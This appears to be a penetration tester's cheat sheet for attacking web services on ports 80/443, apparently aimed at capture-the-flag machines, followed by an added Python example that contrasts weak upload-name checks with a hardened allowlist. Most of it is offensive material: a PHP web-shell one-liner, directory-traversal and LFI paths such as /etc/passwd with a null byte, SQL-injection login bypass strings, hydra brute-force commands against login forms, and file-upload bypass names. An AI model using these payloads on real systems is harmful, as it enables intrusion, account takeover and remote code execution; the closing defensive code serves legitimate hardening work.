80/443 HTTP/s

  • Read Entire page
    • look for emails, names, user info
  • Source code
  • Nikto
    • nikto -h 10.10.10.10 --output filename
  • Subdomains:
    • Dirb
    • dirbuster
      • GUI version
    • gobuster
      • gobuster -w /wordlist.txt -u http://10.10.10.10/ -x php,txt,html
        • use -r (recursive) or try found folders.
    • wfuzz
      • wfuzz -w /wordlist -u tsreetfight.htb/FUZZ --hw 717
      • wfuzz -c -z file,/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt --hc 404 http://10.10.10.86/FUZZ
      • wfuzz -H 'Host: FUZZ.bighead.htb' -w /usr/share/seclist/discovery/DNS/fierce-hostlist.txt -u bighead.htb --hh 11127 #bruteforce subdomains
    • Web Extensions
      • sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar
  • Creating wordlist from webpage
    • cewl
  • Burp intercept
    • compare "host:"
    • CSRF token = no bruteforce
    • add php code if url has anything.php
      • <?php system($_REQUEST['please subscribe']); ?>
    • anything being executed?
      • try directory traversal
        • ../../../home
  • LFI/RFI
    • folder that always exist
      • /etc/hosts /etc/resolv.conf
    • add %00jpg to end of files
      • /etc/passwd%00jpg
  • Sign in Page
    • SQL Injection
      • 'or 1=1-- -
      • ' or '1'=1
      • ' or '1'=1 -- -
      • '--
      • Use known Username
        • tyler' -- -
        • tyler') -- -
    • BruteForce
      • hydra -L <username list> -P <password list> <IP Address> <form parameters><failed login message>
        • kali >hydra -L <wordlist> -P <password list> 192.168.1.101 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" -V
        • hydra 192.168.1.69 http-form-post "/w3af/bruteforce/form_login/dataReceptor.php:user=^USER^&pass=^PASS^:Bad login" -L users.txt -P pass.txt -t 10 -w 30 -o hydra-http-post-attack.txt
  • check website version
  • redirecting webpage automatically?
    • noredirect plugin
  • powershell - bart
  • File Upload
    • Blacklisting bypass
      • bypassed by uploading an uncommon PHP extension that the blacklist does not cover, such as: pht, phpt, phtml, php3, php4, php5, php6
    • Whitelisting bypass
      • bypassed by uploading a file whose name tricks the check, for example a null byte injection ( shell.php%00.gif ) or a double extension ( shell.jpg.php )
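Added example, not code from the original page: a Python upload-name checker that puts the weak blacklist and whitelist checks described above next to a hardened allowlist on the final extension, which also rejects null bytes and an executable extension in any position (so shell.php.jpg is refused as well as shell.jpg.php). The extension sets and function names are assumptions made for this example.

```python
import os
import re
from urllib.parse import unquote

# Allowlist for an image upload handler (constructed for this example).
ALLOWED_IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
# Extensions a PHP stack may hand to the interpreter; a blacklist of just
# "php" misses the uncommon ones listed on this page (pht, phpt, phtml, php3-6).
EXECUTABLE_EXTENSIONS = {"php", "pht", "phpt", "phtml", "php3", "php4",
                         "php5", "php6", "phar"}


def naive_blacklist_allows(filename: str) -> bool:
    """Weak check: only refuses names that end in '.php'."""
    return not filename.lower().endswith(".php")


def naive_whitelist_allows(filename: str) -> bool:
    """Weak check: accepts the name if an image extension appears anywhere in it."""
    return any(f".{ext}" in filename.lower() for ext in ALLOWED_IMAGE_EXTENSIONS)


def hardened_allows(filename: str) -> bool:
    """Allowlist on the final extension after normalising and rejecting tricks."""
    name = unquote(filename)                          # '%00' becomes a real NUL byte
    name = os.path.basename(name.replace("\\", "/"))  # drop any directory part
    if not name or "\0" in name or re.search(r"[^\w.\-]", name):
        return False                                  # NUL, odd characters, empty name
    parts = name.lower().split(".")
    if len(parts) < 2 or "" in parts:
        return False                                  # no extension, leading dot, '..'
    if any(p in EXECUTABLE_EXTENSIONS for p in parts[1:]):
        return False                                  # shell.jpg.php and shell.php.jpg alike
    return parts[-1] in ALLOWED_IMAGE_EXTENSIONS      # only the last extension decides
```

Run each function over names such as shell.phtml, shell.php%00.gif and shell.jpg.php to see which of the two naive checks each bypass defeats and why the hardened check refuses all three.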